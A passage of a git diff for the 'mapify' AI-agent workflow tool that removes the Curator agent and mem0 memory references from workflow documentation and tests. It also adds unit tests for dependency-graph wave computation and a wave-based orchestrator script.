- ✅ Impact analysis (Predictor runs conditionally) - ✅ Tests gate + Linter gate per subtask - ✅ Final-Verifier (adversarial verification at end) -- ✅ **Learning via /map-learn** (Reflector/Curator, optional after workflow) +- ✅ **Learning via /map-learn** (Reflector, optional after workflow) **Optimization strategy:** - **Conditional Predictor:** Runs only if risk detected (security, breaking changes) -- **Batched Learning:** Reflector/Curator run ONCE after all subtasks complete +- **Batched Learning:** Reflector runs ONCE after all subtasks complete - **Result:** 35-40% token savings vs full pipeline while preserving learning - **Same quality gates:** Monitor still validates each subtask @@ -151,7 +148,6 @@ Despite token optimization, preserves: - Per-subtask validation (Monitor always checks) - Complete implementation feedback loops - Full learning (batched, not skipped) -- mem0 pattern growth from all tasks **See also:** [resources/map-efficient-deep-dive.md](resources/map-efficient-deep-dive.md) @@ -171,7 +167,7 @@ Despite token optimization, preserves: - ✅ Validation (Monitor verifies fix) - ✅ Root cause analysis - ✅ Impact assessment (Predictor) -- ✅ Learning (Reflector/Curator) +- ✅ Learning (Reflector) **Specialized features:** - Error log analysis @@ -233,8 +229,7 @@ MAP workflows orchestrate **12 specialized agents**, each with specific responsi **Actor** — Writes code and implements - Generates implementation - Makes file changes -- Uses existing patterns from mem0 -- Queries mem0 for relevant knowledge +- Uses existing patterns from previous workflows **Monitor** — Validates correctness - Checks implementation against criteria @@ -263,18 +258,10 @@ MAP workflows orchestrate **12 specialized agents**, each with specific responsi **Reflector** — Pattern extraction - Analyzes what worked and failed - Extracts reusable patterns -- Searches mem0 for existing knowledge via `mcp__mem0__map_tiered_search` -- Prevents duplicate pattern storage +- Prevents duplicate pattern extraction - **Batched in /map-efficient** (runs once at end, via /map-learn) - **Skipped in /map-fast** (no learning) -**Curator** — Knowledge management -- Stores patterns in mem0 via `mcp__mem0__map_add_pattern` -- Deduplicates via tiered search -- Archives outdated patterns via `mcp__mem0__map_archive_pattern` -- Maintains pattern metadata -- **Batched in /map-efficient** (runs once at end) - ### Optional Agent **Documentation-Reviewer** — Documentation validation @@ -389,27 +376,6 @@ Predictor runs if: - High complexity estimated - Multiple files affected -**Q: How does the mem0 tiered memory system work?** - -A: mem0 MCP provides tiered pattern storage: - -**L1 (Branch-scoped)** -- Patterns specific to current feature branch -- Experimental patterns for current work -- Fastest access - -**L2 (Project-scoped)** -- Shared project knowledge -- Validated patterns used across branches -- Standard access - -**L3 (Org-scoped)** -- Cross-project patterns -- Organizational best practices -- Broadest scope - -Search flows: L1 → L2 → L3 (most specific first) - --- ## Resources & Deep Dives @@ -496,10 +462,8 @@ MAP: 📚 Loads this skill for context 1. **Default to /map-efficient** — It's the recommended choice for 80% of tasks 2. **Use /map-fast sparingly** — Only for small, low-risk changes with clear scope 3. **Use /map-efficient for critical paths** — Describe risk context in the task description for appropriate Predictor triggers -4. **Monitor pattern growth** — Use mem0 search to see learning improving -5. **Trust the optimization** — /map-efficient preserves quality while cutting token usage -6. **Review deep dives** — When in doubt, check the appropriate deep-dive resource -7. **Leverage mem0 patterns** — Stored patterns from previous tasks via tiered search +4. **Trust the optimization** — /map-efficient preserves quality while cutting token usage +5. **Review deep dives** — When in doubt, check the appropriate deep-dive resource --- @@ -555,7 +519,6 @@ MAP: 📚 Loads this skill for context | Wrong workflow chosen mid-task | Cannot switch workflows during execution | Complete current workflow, then restart with correct one | | Predictor never runs in /map-efficient | Subtasks assessed as low-risk | Expected behavior; Predictor is conditional. Use /map-debug for guaranteed analysis | | No patterns stored after /map-fast | /map-fast skips learning agents | By design — use /map-efficient + /map-learn for pattern accumulation | -| mem0 search returns empty | mem0 MCP not configured or namespaces mismatch | Verify mem0 in `.claude/mcp_config.json`, check namespace conventions | | Skill suggests wrong workflow | Description trigger mismatch | Check skill-rules.json triggers; refine query wording | --- diff --git a/src/mapify_cli/templates/skills/map-workflows-guide/resources/agent-architecture.md b/src/mapify_cli/templates/skills/map-workflows-guide/resources/agent-architecture.md index d4a8d25..1b8b212 100644 --- a/src/mapify_cli/templates/skills/map-workflows-guide/resources/agent-architecture.md +++ b/src/mapify_cli/templates/skills/map-workflows-guide/resources/agent-architecture.md @@ -1,6 +1,6 @@ # Agent Architecture -MAP Framework orchestrates 12 specialized agents in a coordinated workflow. +MAP Framework orchestrates 11 specialized agents in a coordinated workflow. ## Agent Categories @@ -14,7 +14,7 @@ MAP Framework orchestrates 12 specialized agents in a coordinated workflow. **2. Actor** - **Role:** Implements code changes -- **Input:** Subtask description, acceptance criteria, mem0 pattern context +- **Input:** Subtask description, acceptance criteria - **Output:** Code changes, rationale, test strategy - **When it runs:** For each subtask (multiple times if revisions needed) @@ -53,16 +53,6 @@ MAP Framework orchestrates 12 specialized agents in a coordinated workflow. - **When it runs:** - /map-efficient, /map-debug, /map-debate: Batched (once at end, via /map-learn) - /map-fast: Never (skipped) -- **MCP Tool:** Uses `mcp__mem0__map_tiered_search` to check for existing patterns - -**7. Curator** -- **Role:** Updates memory with validated patterns -- **Input:** Reflector insights -- **Output:** Delta operations (ADD/UPDATE/ARCHIVE patterns) -- **When it runs:** After Reflector -- **MCP Tools:** - - `mcp__mem0__map_tiered_search` to deduplicate - - `mcp__mem0__map_add_pattern` to store new patterns ### Optional @@ -121,7 +111,7 @@ TaskDecomposer ↓ Final-Verifier (adversarial verification of entire goal) ↓ - Done! Optional: /map-learn → Reflector → Curator + Done! Optional: /map-learn → Reflector ``` ### Multi-Variant Pipeline (map-debate) @@ -135,7 +125,7 @@ TaskDecomposer Monitor → [Predictor if high risk] → Apply changes ↓ Batch learning (via /map-learn): - Reflector (all subtasks) → Curator → Done + Reflector (all subtasks) → Done ``` --- @@ -193,7 +183,6 @@ Otherwise: Skipped (token savings) ### Workflow State - All subtask results - Aggregated patterns (Reflector) -- mem0 delta operations (Curator) --- @@ -223,8 +212,8 @@ Agents communicate via structured JSON: - Actor iterates (max 3-5 attempts) - If still failing: Mark subtask as failed, continue with others -### MCP Tool Failures -- Reflector/Curator gracefully degrade +### Learning Failures +- Reflector gracefully degrades - Learning skipped but implementation continues - Logged to stderr for debugging @@ -242,7 +231,6 @@ Agents communicate via structured JSON: | Evaluator | ~0.8K | Per subtask | map-debug, map-review | | Predictor | ~1.5K | Per subtask or conditional | Varies | | Reflector | ~2K | Per subtask or batched | Varies | -| Curator | ~1.5K | After Reflector | Varies | | Debate-Arbiter | ~3-4K | Per subtask | map-debate only | | Synthesizer | ~2K | Per subtask | map-efficient (--self-moa) | | Research-Agent | ~2-3K | Once (before Actor) | map-plan, map-efficient, map-debug | @@ -251,7 +239,7 @@ Agents communicate via structured JSON: **map-efficient savings:** - Skip Evaluator: ~0.8K per subtask - Conditional Predictor: ~1.5K per low-risk subtask -- Batch Reflector/Curator: ~(N-1) × 3.5K for N subtasks +- Batch Reflector: ~(N-1) × 2K for N subtasks --- diff --git a/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-debug-deep-dive.md b/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-debug-deep-dive.md index 37e5aab..959e188 100644 --- a/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-debug-deep-dive.md +++ b/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-debug-deep-dive.md @@ -39,7 +39,7 @@ - How was it fixed? - How to prevent similar bugs? -4. Curator documents: + Reflector also documents: - Debugging techniques used - Common pitfalls - Prevention strategies @@ -152,9 +152,6 @@ Reflector: ├─ Solution: "Use mutex for critical sections" └─ Prevention: "Design for immutability" -Curator: -├─ ADD "debug-0042: Async race condition patterns" -└─ ADD "impl-0099: Use immutable state updates" ``` --- @@ -221,7 +218,7 @@ Root cause: Improper async error handling 2. What test was missing? 3. What pattern should we follow? -**Curator documents:** +**Reflector documents:** ```json { "type": "TESTING_STRATEGY", diff --git a/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-efficient-deep-dive.md b/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-efficient-deep-dive.md index 1e69fbf..6a2afb0 100644 --- a/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-efficient-deep-dive.md +++ b/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-efficient-deep-dive.md @@ -34,15 +34,15 @@ Subtask 3: Add unit tests (tests/auth.test.ts) → Predictor: ⏭️ SKIPPED (test file, no side effects) ``` -### Reflector/Curator: Batched Learning +### Reflector: Batched Learning **Full pipeline (theoretical baseline):** ``` -Subtask 1 → Actor → Monitor → Predictor → Evaluator → Reflector → Curator -Subtask 2 → Actor → Monitor → Predictor → Evaluator → Reflector → Curator -Subtask 3 → Actor → Monitor → Predictor → Evaluator → Reflector → Curator +Subtask 1 → Actor → Monitor → Predictor → Evaluator → Reflector +Subtask 2 → Actor → Monitor → Predictor → Evaluator → Reflector +Subtask 3 → Actor → Monitor → Predictor → Evaluator → Reflector ``` -Result: 3 × (Predictor + Evaluator + Reflector + Curator) cycles +Result: 3 × (Predictor + Evaluator + Reflector) cycles **Optimized workflow (/map-efficient):** ``` @@ -53,9 +53,9 @@ Subtask 3 → Actor → Monitor → [Predictor if high risk] → Apply Final-Verifier (adversarial verification) ↓ Done! Optionally run /map-learn: - Reflector (analyzes ALL subtasks) → Curator (consolidates patterns) + Reflector (analyzes ALL subtasks, consolidates patterns) ``` -Result: No Evaluator, no per-subtask Reflector/Curator. Learning decoupled to /map-learn. +Result: No Evaluator, no per-subtask Reflector. Learning decoupled to /map-learn. **Token savings:** 35-40% vs full pipeline @@ -91,7 +91,7 @@ Result: No Evaluator, no per-subtask Reflector/Curator. Learning decoupled to /m **What's optimized (intentionally omitted per-subtask):** - Evaluator — Monitor validates correctness directly -- Reflector/Curator — decoupled to /map-learn (optional, run after workflow) +- Reflector — decoupled to /map-learn (optional, run after workflow) --- @@ -139,13 +139,9 @@ Final-Verifier: ✅ All subtasks verified, goal achieved Optional /map-learn: Reflector (batched): ├─ Analyzed: 3 subtasks - ├─ Searched mem0: Found similar pagination patterns - └─ Extracted: pagination pattern, API versioning, test structure - - Curator (batched): - ├─ Checked duplicates: 2 similar bullets found - ├─ Added: 1 new bullet (API pagination pattern) - └─ Updated: 1 existing bullet (test coverage++) + ├─ Found similar pagination patterns + ├─ Extracted: pagination pattern, API versioning, test structure + └─ Consolidated: 1 new pattern (API pagination), 1 updated (test coverage++) ``` **Token usage:** @@ -192,7 +188,7 @@ BATCH_SIZE = None # or 5 for large tasks **Fix:** Review `subtask.modifies_critical_files()` logic **Issue:** Learning not happening -**Cause:** Reflector/Curator not running +**Cause:** Reflector not running **Fix:** Check workflow completion (must finish all subtasks) **Issue:** Token usage higher than expected diff --git a/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-fast-deep-dive.md b/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-fast-deep-dive.md index 08161fe..dce9fc9 100644 --- a/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-fast-deep-dive.md +++ b/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-fast-deep-dive.md @@ -45,11 +45,6 @@ - Failures not documented - Knowledge not extracted -**Curator (mem0 Pattern Updates)** -- No mem0 patterns created -- No pattern synchronization -- No cross-project learning - ### What Remains **Actor + Monitor:** @@ -70,7 +65,6 @@ | Evaluator | ~0.8K | ❌ Skipped | | Predictor | ~1.5K | ❌ Skipped | | Reflector | ~2K | ❌ Skipped | -| Curator | ~1.5K | ❌ Skipped | **Total saved:** ~5.8K per subtask **Percentage:** 40-50% vs full pipeline @@ -96,7 +90,7 @@ ST-1: Setup React Query client Actor → Monitor → Apply ST-2: Test with one API endpoint Actor → Monitor → Apply -Done. No Evaluator, no Reflector, no Curator, no patterns learned. +Done. No Evaluator, no Reflector, no patterns learned. ``` **Appropriate because:** @@ -121,7 +115,7 @@ Risk: High (security, breaking changes) **Problems with using map-fast:** 1. No Predictor → Breaking changes undetected 2. No Reflector → Security patterns not learned -3. No Curator → Team doesn't learn from mistakes +3. No learning → Team doesn't learn from mistakes 4. High risk for under-validation mindset **Correct choice:** `/map-efficient` (critical infrastructure) diff --git a/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-feature-deep-dive.md b/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-feature-deep-dive.md index d0a2f80..9b84fdf 100644 --- a/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-feature-deep-dive.md +++ b/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-feature-deep-dive.md @@ -34,14 +34,13 @@ For each subtask: 4. Evaluator scores quality 5. If approved: 5a. Reflector extracts patterns - 5b. Curator stores patterns in mem0 - 5c. Apply changes + 5b. Apply changes 6. If not approved: Return to Actor ``` **Key difference from /map-efficient:** - Predictor runs EVERY subtask (not conditional) -- Reflector/Curator run AFTER EVERY subtask (not batched) +- Reflector runs AFTER EVERY subtask (not batched) --- @@ -54,11 +53,10 @@ For each subtask: Subtask 1: Implement JWT generation ↓ completed Reflector: "JWT secret storage pattern" -Curator: Add pattern "impl-0099: Store secrets in env vars" - ↓ mem0 updated + ↓ pattern extracted Subtask 2: Implement JWT validation ↓ starts -Actor queries mem0: Finds "impl-0099" +Actor uses learned pattern ↓ applies pattern Uses env vars (learned from Subtask 1) ``` @@ -70,10 +68,10 @@ Uses env vars (learned from Subtask 1) **Per-subtask (/map-feature):** - ✅ Immediate pattern application - ✅ Error correction within workflow -- ❌ Higher token cost (N × Reflector/Curator) +- ❌ Higher token cost (N × Reflector) **Batched (/map-efficient):** -- ✅ Lower token cost (1 × Reflector/Curator) +- ✅ Lower token cost (1 × Reflector) - ⚠️ Patterns applied in next workflow - ✅ Holistic insights (sees all subtasks together) @@ -109,19 +107,16 @@ ST-1: OAuth2 provider config ├─ Predictor: ✅ RAN (security-sensitive) │ └─ Impact: Config must not be committed ├─ Evaluator: ✅ Approved (score: 9/10) -├─ Reflector: Pattern "Store OAuth secrets in env" -└─ Curator: ADD "sec-0042: OAuth secrets in .env" +└─ Reflector: Pattern "Store OAuth secrets in env" ST-2: Authorization code flow ├─ Actor: Implement auth/oauth.ts -│ └─ Queries mem0: Finds "sec-0042" │ └─ Uses .env for secrets (learned from ST-1!) ├─ Monitor: ✅ Valid ├─ Predictor: ✅ RAN (affects auth flow) │ └─ Impact: All protected routes need update ├─ Evaluator: ✅ Approved (score: 9/10) -├─ Reflector: Pattern "PKCE for public clients" -└─ Curator: ADD "sec-0043: Use PKCE extension" +└─ Reflector: Pattern "PKCE for public clients" [ST-3, ST-4, ST-5 continue with same pattern] ``` @@ -209,7 +204,7 @@ ST-2: Authorization code flow - ✅ No security vulnerabilities **Knowledge captured:** -- ✅ mem0 patterns created (N subtasks → N+ patterns) +- ✅ Patterns extracted (N subtasks → N+ patterns) - ✅ Team can apply patterns immediately **Impact understood:** @@ -225,9 +220,9 @@ ST-2: Authorization code flow **Cause:** Per-subtask learning overhead **Solution:** Consider /map-efficient for next similar task -**Issue:** Too many mem0 patterns created +**Issue:** Too many patterns created **Cause:** Reflector suggesting redundant patterns -**Solution:** Curator should check for duplicates more aggressively +**Solution:** Review and deduplicate patterns more aggressively **Issue:** Predictor always says "high risk" **Cause:** Overly conservative risk assessment @@ -238,4 +233,3 @@ ST-2: Authorization code flow **See also:** - [map-efficient-deep-dive.md](map-efficient-deep-dive.md) - Optimized alternative - [agent-architecture.md](agent-architecture.md) - Understanding all agents -- [mem0 tiered search](../../map-cli-reference/SKILL.md) - How knowledge is stored and retrieved diff --git a/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-refactor-deep-dive.md b/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-refactor-deep-dive.md index 2faed47..8865244 100644 --- a/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-refactor-deep-dive.md +++ b/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-refactor-deep-dive.md @@ -53,8 +53,6 @@ Refactoring = Changing structure WITHOUT changing behavior - What patterns emerged? - What dependencies were discovered? - What risks were mitigated? - -4. Curator documents: - Refactoring techniques - Dependency patterns - Migration strategies @@ -203,9 +201,6 @@ Reflector: ├─ Pattern: "Use dependency injection for services" └─ Technique: "Incremental refactoring (6 safe steps)" -Curator: -├─ ADD "arch-0042: Controller-Service pattern" -└─ ADD "refactor-0099: Incremental extraction technique" ``` **Token usage:** ~9K tokens (6 subtasks, Predictor always runs) diff --git a/src/mapify_cli/templates/skills/skill-rules.json b/src/mapify_cli/templates/skills/skill-rules.json index 20aac1d..6212eeb 100644 --- a/src/mapify_cli/templates/skills/skill-rules.json +++ b/src/mapify_cli/templates/skills/skill-rules.json @@ -52,23 +52,22 @@ "type": "domain", "enforcement": "suggest", "priority": "high", - "description": "CLI and MCP error corrections", + "description": "CLI error corrections", "promptTriggers": { "keywords": [ "mapify command", "mapify error", "no such command", "no such option", - "mem0 mcp", "validate graph", "mapify init", "mapify check" ], "intentPatterns": [ - "(mapify|mem0).*(error|command|help|usage)", + "mapify.*(error|command|help|usage)", "(no such).*(command|option)", "validate.*(graph|dependency)", - "(how to|how do).*(mapify|mem0)" + "(how to|how do).*mapify" ] } } diff --git a/tests/test_agent_cli_correctness.py b/tests/test_agent_cli_correctness.py index c7108a7..965bb16 100644 --- a/tests/test_agent_cli_correctness.py +++ b/tests/test_agent_cli_correctness.py @@ -65,7 +65,7 @@ def test_agents_have_cli_reference(self, agent_files): warnings = [] # Agents that should have CLI guidance - cli_heavy_agents = ["actor.md", "reflector.md", "curator.md"] + cli_heavy_agents = ["actor.md", "reflector.md"] for agent_file in agent_files: if agent_file.name in cli_heavy_agents: diff --git a/tests/test_command_templates.py b/tests/test_command_templates.py index 82dc329..11b0afb 100644 --- a/tests/test_command_templates.py +++ b/tests/test_command_templates.py @@ -120,9 +120,8 @@ def test_map_fast_workflow_structure(self, templates_commands_dir): assert "Actor" in content or "actor" in content assert "Monitor" in content or "monitor" in content - # Check that Reflector/Curator are mentioned as SKIPPED + # Check that Reflector is mentioned as SKIPPED assert "reflector" in content.lower(), "Should mention Reflector (as skipped)" - assert "curator" in content.lower(), "Should mention Curator (as skipped)" assert ( "skipped" in content.lower() or "no learning" in content.lower() ), "Should indicate learning is skipped" @@ -231,11 +230,6 @@ def test_three_agent_task_calls(self, review_content): assert 'subagent_type="predictor"' in review_content assert 'subagent_type="evaluator"' in review_content - def test_four_mem0_queries(self, review_content): - """Command includes at least 4 mem0 tiered search queries.""" - count = review_content.count("map_tiered_search") - assert count >= 4, f"Expected at least 4 mem0 queries, found {count}" - def test_ci_mode_flag(self, review_content): """Command documents --ci flag for CI mode.""" assert "--ci" in review_content diff --git a/tests/test_dependency_graph.py b/tests/test_dependency_graph.py index 4b72e58..5c3dddf 100644 --- a/tests/test_dependency_graph.py +++ b/tests/test_dependency_graph.py @@ -203,5 +203,153 @@ def test_topological_sort_valid_dag(self): assert result.index("ST-002") < result.index("ST-003") +class TestComputeWaves: + """Tests for compute_waves() - topological wave computation.""" + + def test_linear_chain_produces_single_subtask_waves(self): + """Linear chain: each subtask in its own wave.""" + graph = DependencyGraph() + graph.add_node(SubtaskNode(id="ST-001", dependencies=[])) + graph.add_node(SubtaskNode(id="ST-002", dependencies=["ST-001"])) + graph.add_node(SubtaskNode(id="ST-003", dependencies=["ST-002"])) + + waves = graph.compute_waves() + assert waves == [["ST-001"], ["ST-002"], ["ST-003"]] + + def test_fan_out_produces_parallel_wave(self): + """Fan-out: root node then all dependents in one wave.""" + graph = DependencyGraph() + graph.add_node(SubtaskNode(id="ST-001", dependencies=[])) + graph.add_node(SubtaskNode(id="ST-002", dependencies=["ST-001"])) + graph.add_node(SubtaskNode(id="ST-003", dependencies=["ST-001"])) + graph.add_node(SubtaskNode(id="ST-004", dependencies=["ST-001"])) + + waves = graph.compute_waves() + assert waves == [["ST-001"], ["ST-002", "ST-003", "ST-004"]] + + def test_diamond_produces_three_waves(self): + """Diamond DAG: root, two parallel, then merge node.""" + graph = DependencyGraph() + graph.add_node(SubtaskNode(id="ST-001", dependencies=[])) + graph.add_node(SubtaskNode(id="ST-002", dependencies=["ST-001"])) + graph.add_node(SubtaskNode(id="ST-003", dependencies=["ST-001"])) + graph.add_node(SubtaskNode(id="ST-004", dependencies=["ST-002", "ST-003"])) + + waves = graph.compute_waves() + assert waves == [["ST-001"], ["ST-002", "ST-003"], ["ST-004"]] + + def test_cycle_returns_none(self): + """Cycle in graph should return None.""" + graph = DependencyGraph() + graph.add_node(SubtaskNode(id="ST-001", dependencies=["ST-002"])) + graph.add_node(SubtaskNode(id="ST-002", dependencies=["ST-001"])) + + assert graph.compute_waves() is None + + def test_empty_graph_returns_empty_list(self): + """Empty graph returns empty list.""" + graph = DependencyGraph() + assert graph.compute_waves() == [] + + def test_single_node_returns_single_wave(self): + """Single node returns one wave with one element.""" + graph = DependencyGraph() + graph.add_node(SubtaskNode(id="ST-001", dependencies=[])) + + assert graph.compute_waves() == [["ST-001"]] + + def test_multiple_roots_in_first_wave(self): + """Multiple independent roots all appear in wave 0.""" + graph = DependencyGraph() + graph.add_node(SubtaskNode(id="ST-001", dependencies=[])) + graph.add_node(SubtaskNode(id="ST-002", dependencies=[])) + graph.add_node(SubtaskNode(id="ST-003", dependencies=["ST-001", "ST-002"])) + + waves = graph.compute_waves() + assert waves == [["ST-001", "ST-002"], ["ST-003"]] + + def test_dangling_dependency_treated_as_root(self): + """Node with dependency not in graph is treated as having no deps.""" + graph = DependencyGraph() + graph.add_node(SubtaskNode(id="ST-001", dependencies=["ST-MISSING"])) + graph.add_node(SubtaskNode(id="ST-002", dependencies=["ST-001"])) + + waves = graph.compute_waves() + assert waves == [["ST-001"], ["ST-002"]] + + +class TestSplitWaveByFileConflicts: + """Tests for split_wave_by_file_conflicts().""" + + def test_no_overlap_single_sub_wave(self): + """No file overlap: all subtasks in one sub-wave.""" + graph = DependencyGraph() + wave = ["ST-002", "ST-003", "ST-004"] + files = { + "ST-002": {"a.py"}, + "ST-003": {"b.py"}, + "ST-004": {"c.py"}, + } + result = graph.split_wave_by_file_conflicts(wave, files) + assert result == [["ST-002", "ST-003", "ST-004"]] + + def test_partial_overlap_splits_into_sub_waves(self): + """Partial overlap: conflicting subtasks in separate sub-waves.""" + graph = DependencyGraph() + wave = ["ST-002", "ST-003", "ST-004"] + files = { + "ST-002": {"a.py"}, + "ST-003": {"b.py"}, + "ST-004": {"a.py"}, + } + result = graph.split_wave_by_file_conflicts(wave, files) + assert result == [["ST-002", "ST-003"], ["ST-004"]] + + def test_all_overlap_each_in_own_sub_wave(self): + """All subtasks share files: each in its own sub-wave.""" + graph = DependencyGraph() + wave = ["ST-001", "ST-002", "ST-003"] + files = { + "ST-001": {"shared.py"}, + "ST-002": {"shared.py"}, + "ST-003": {"shared.py"}, + } + result = graph.split_wave_by_file_conflicts(wave, files) + assert result == [["ST-001"], ["ST-002"], ["ST-003"]] + + def test_empty_affected_files_placed_alone(self): + """Subtasks with empty affected_files are placed in their own sub-wave.""" + graph = DependencyGraph() + wave = ["ST-001", "ST-002", "ST-003"] + files = { + "ST-001": {"a.py"}, + "ST-002": set(), # empty = unknown + "ST-003": {"b.py"}, + } + result = graph.split_wave_by_file_conflicts(wave, files) + # ST-002 should be alone, ST-001 and ST-003 can be together + assert ["ST-002"] in result + assert ["ST-001", "ST-003"] in result + + def test_missing_from_map_treated_as_empty(self): + """Subtask not in affected_files_map treated as empty (placed alone).""" + graph = DependencyGraph() + wave = ["ST-001", "ST-002"] + files = {"ST-001": {"a.py"}} # ST-002 missing + result = graph.split_wave_by_file_conflicts(wave, files) + assert ["ST-002"] in result + + def test_single_subtask_wave(self): + """Single subtask wave returns as-is.""" + graph = DependencyGraph() + result = graph.split_wave_by_file_conflicts(["ST-001"], {"ST-001": {"a.py"}}) + assert result == [["ST-001"]] + + def test_empty_wave(self): + """Empty wave returns empty list.""" + graph = DependencyGraph() + assert graph.split_wave_by_file_conflicts([], {}) == [] + + if __name__ == "__main__": pytest.main([__file__, "-v"]) diff --git a/tests/test_map_orchestrator.py b/tests/test_map_orchestrator.py new file mode 100644 index 0000000..b51b898 --- /dev/null +++ b/tests/test_map_orchestrator.py @@ -0,0 +1,284 @@ +""" +Tests for map_orchestrator.py — wave-based parallel execution commands. + +Validates: +- set_waves: computes execution_waves from blueprint +- get_wave_step: returns parallel/sequential mode +- validate_wave_step: advances per-subtask phase +- advance_wave: increments current_wave_index +- Backward compat: get_next_step works when execution_waves is empty +""" + +import json +import sys +from pathlib import Path + +import pytest + +# The orchestrator is a template script, not a regular package module. +# We need to import it from its template location. +ORCHESTRATOR_PATH = ( + Path(__file__).resolve().parents[1] + / "src" + / "mapify_cli" + / "templates" + / "map" + / "scripts" +) + +# Add the scripts directory to sys.path so we can import map_orchestrator +sys.path.insert(0, str(ORCHESTRATOR_PATH)) + +import map_orchestrator # noqa: E402 + + +@pytest.fixture +def branch_dir(tmp_path, monkeypatch): + """Create a temporary .map// directory and patch get_branch_name.""" + branch = "test-branch" + map_dir = tmp_path / ".map" / branch + map_dir.mkdir(parents=True) + (map_dir / "evidence").mkdir() + monkeypatch.chdir(tmp_path) + monkeypatch.setattr(map_orchestrator, "get_branch_name", lambda: branch) + return branch + + +@pytest.fixture +def sample_blueprint(tmp_path): + """Create a sample blueprint JSON with a fan-out DAG.""" + branch = "test-branch" + bp_dir = tmp_path / ".map" / branch + bp_dir.mkdir(parents=True, exist_ok=True) + blueprint = { + "subtasks": [ + { + "id": "ST-001", + "dependencies": [], + "affected_files": ["models.py"], + }, + { + "id": "ST-002", + "dependencies": ["ST-001"], + "affected_files": ["views.py"], + }, + { + "id": "ST-003", + "dependencies": ["ST-001"], + "affected_files": ["urls.py"], + }, + { + "id": "ST-004", + "dependencies": ["ST-002", "ST-003"], + "affected_files": ["tests.py"], + }, + ] + } + bp_file = bp_dir / "blueprint.json" + bp_file.write_text(json.dumps(blueprint), encoding="utf-8") + return str(bp_file) + + +class TestSetWaves: + """Tests for set_waves command.""" + + def test_set_waves_produces_correct_waves(self, branch_dir, sample_blueprint): + result = map_orchestrator.set_waves(branch_dir, sample_blueprint) + assert result["status"] == "success" + waves = result["execution_waves"] + assert waves[0] == ["ST-001"] + assert set(waves[1]) == {"ST-002", "ST-003"} + assert waves[2] == ["ST-004"] + + def test_set_waves_stores_in_state(self, branch_dir, sample_blueprint): + map_orchestrator.set_waves(branch_dir, sample_blueprint) + state_file = Path(f".map/{branch_dir}/step_state.json") + state = json.loads(state_file.read_text(encoding="utf-8")) + assert len(state["execution_waves"]) == 3 + assert state["current_wave_index"] == 0 + + def test_set_waves_missing_blueprint(self, branch_dir): + result = map_orchestrator.set_waves(branch_dir, "/nonexistent.json") + assert result["status"] == "error" + assert "not found" in result["message"] + + def test_set_waves_splits_file_conflicts(self, branch_dir, tmp_path): + """Subtasks sharing files get split into sub-waves.""" + branch = branch_dir + bp_dir = tmp_path / ".map" / branch + bp_dir.mkdir(parents=True, exist_ok=True) + blueprint = { + "subtasks": [ + {"id": "ST-001", "dependencies": [], "affected_files": ["shared.py"]}, + {"id": "ST-002", "dependencies": [], "affected_files": ["shared.py"]}, + ] + } + bp_file = bp_dir / "blueprint.json" + bp_file.write_text(json.dumps(blueprint), encoding="utf-8") + + result = map_orchestrator.set_waves(branch, str(bp_file)) + assert result["status"] == "success" + # Both are roots (wave 0) but share files, so should be split + waves = result["execution_waves"] + assert len(waves) == 2 + assert waves[0] == ["ST-001"] + assert waves[1] == ["ST-002"] + + +class TestGetWaveStep: + """Tests for get_wave_step command.""" + + def test_parallel_mode_for_multi_subtask_wave(self, branch_dir, sample_blueprint): + map_orchestrator.set_waves(branch_dir, sample_blueprint) + # Advance past wave 0 (single subtask) + map_orchestrator.advance_wave(branch_dir) + result = map_orchestrator.get_wave_step(branch_dir) + assert result["mode"] == "parallel" + assert len(result["subtasks"]) == 2 + + def test_sequential_mode_for_single_subtask_wave( + self, branch_dir, sample_blueprint + ): + map_orchestrator.set_waves(branch_dir, sample_blueprint) + result = map_orchestrator.get_wave_step(branch_dir) + assert result["mode"] == "sequential" + assert len(result["subtasks"]) == 1 + assert result["subtasks"][0]["subtask_id"] == "ST-001" + + def test_is_complete_when_all_waves_done(self, branch_dir, sample_blueprint): + map_orchestrator.set_waves(branch_dir, sample_blueprint) + # Advance past all 3 waves + map_orchestrator.advance_wave(branch_dir) + map_orchestrator.advance_wave(branch_dir) + map_orchestrator.advance_wave(branch_dir) + result = map_orchestrator.get_wave_step(branch_dir) + assert result["is_complete"] is True + + def test_no_waves_returns_complete(self, branch_dir): + """When no waves configured, returns complete with sequential message.""" + # Initialize state without waves + state = map_orchestrator.StepState() + state.save(Path(f".map/{branch_dir}/step_state.json")) + result = map_orchestrator.get_wave_step(branch_dir) + assert result["is_complete"] is True + assert result["mode"] == "sequential" + + +class TestValidateWaveStep: + """Tests for validate_wave_step command.""" + + def test_advances_subtask_phase(self, branch_dir, sample_blueprint): + map_orchestrator.set_waves(branch_dir, sample_blueprint) + result = map_orchestrator.validate_wave_step("ST-001", "2.0", branch_dir) + assert result["valid"] is True + assert result["next_phase"] == "2.1" + + def test_actor_step_advances_to_monitor(self, branch_dir, sample_blueprint): + map_orchestrator.set_waves(branch_dir, sample_blueprint) + # Create evidence file for actor step + evidence_dir = Path(f".map/{branch_dir}/evidence") + evidence = { + "phase": "actor", + "subtask_id": "ST-001", + "timestamp": "2026-01-01T00:00:00Z", + } + (evidence_dir / "actor_ST-001.json").write_text( + json.dumps(evidence), encoding="utf-8" + ) + result = map_orchestrator.validate_wave_step("ST-001", "2.3", branch_dir) + assert result["valid"] is True + assert result["next_phase"] == "2.4" + + def test_missing_evidence_blocks_validation(self, branch_dir, sample_blueprint): + map_orchestrator.set_waves(branch_dir, sample_blueprint) + result = map_orchestrator.validate_wave_step("ST-001", "2.3", branch_dir) + assert result["valid"] is False + assert "Evidence file missing" in result["message"] + + +class TestAdvanceWave: + 